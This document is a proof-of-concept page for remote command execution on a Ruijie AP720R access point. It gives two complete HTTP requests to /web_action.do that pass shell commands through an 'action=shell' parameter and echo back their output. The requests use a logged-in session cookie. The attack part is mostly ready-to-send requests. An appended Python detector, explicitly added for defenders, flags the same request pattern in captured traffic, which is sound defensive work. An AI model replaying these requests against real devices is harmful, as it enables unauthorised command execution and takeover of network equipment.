PoC for a remote command execution (RCE) vulnerability in a Ruijie device model

Original article

Penetration testing study (Ruijie AP720R)
https://xianzhi.aliyun.com/forum/topic/1538/

Model

Router: Ruijie AP720R
Model: RG-AP720-L
Version: V1.10

Command output is echoed back in the response

POC

POC1

POST /web_action.do HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://x.x.x.x/
Content-Length: 70
Cookie: LOCAL_LANG_COOKIE=zh; UI_LOCAL_COOKIE=zh; SID=F23E18BDA014D308240A53206BEAD58; login=1; mac=0074.9c2b.472c; oid=
Connection: close

action=shell&command=ls+-l+%2Fdata%2F.rgos%2Fvsd%2F0%2Foam%2Fweb%2Fxml

POC2

POST /web_action.do HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://x.x.x.x/
Content-Length: 37
Cookie: LOCAL_LANG_COOKIE=zh; UI_LOCAL_COOKIE=zh; SID=F23E18BDA014D308240A53206BEAD58; login=1; mac=0074.9c2b.472c; oid=
Connection: close

action=shell&command=cat+/etc/version
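
Detection (added example, not part of the original post): a Python check that a defender can run over captured HTTP requests, for example from a proxy or WAF log, to flag the request pattern shown in POC1 and POC2 and recover the decoded command. The endpoint and parameter names come from the requests above; the function names, the sample requests and the extra query-string check are assumptions made for illustration.

```python
"""Flag captured HTTP requests matching the web_action.do shell pattern."""
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter names are taken from the two requests on this page.
TARGET_PATH = "/web_action.do"


def inspect_request(raw):
    """Return the decoded command if the request matches, else None."""
    # Accept CRLF or LF captures; one blank line separates headers and body.
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2:
        return None  # not an HTTP request line
    target = urlsplit(request_line[1])
    if target.path.lower() != TARGET_PATH:
        return None
    # Assumption: parameters may arrive in the query string as well as the
    # form body, so both are merged before checking.
    fields = parse_qs(body.strip(), keep_blank_values=True)
    for key, values in parse_qs(target.query, keep_blank_values=True).items():
        fields.setdefault(key, []).extend(values)
    if "shell" not in (v.lower() for v in fields.get("action", [])):
        return None
    # parse_qs has already decoded '+' and %XX escapes.
    return " ; ".join(fields.get("command", []))


def scan(requests):
    """Return (index, decoded command) for every matching request."""
    hits = []
    for i, raw in enumerate(requests):
        cmd = inspect_request(raw)
        if cmd is not None:
            hits.append((i, cmd))
    return hits


def _req(path, body):
    # Constructed sample request; 192.0.2.10 is a documentation address.
    return (f"POST {path} HTTP/1.1\r\nHost: 192.0.2.10\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


# Constructed samples: the two bodies from this page plus one benign request.
SAMPLES = [
    _req("/web_action.do", "action=shell&command=ls+-l+%2Fdata%2F.rgos%2Fvsd%2F0%2Foam%2Fweb%2Fxml"),
    _req("/web_action.do", "action=shell&command=cat+/etc/version"),
    _req("/web_action.do", "action=status"),  # hypothetical benign action
]
```

Any hit from scan() on traffic that does not originate from an administrator's own session is worth investigating, since the response returns the command output.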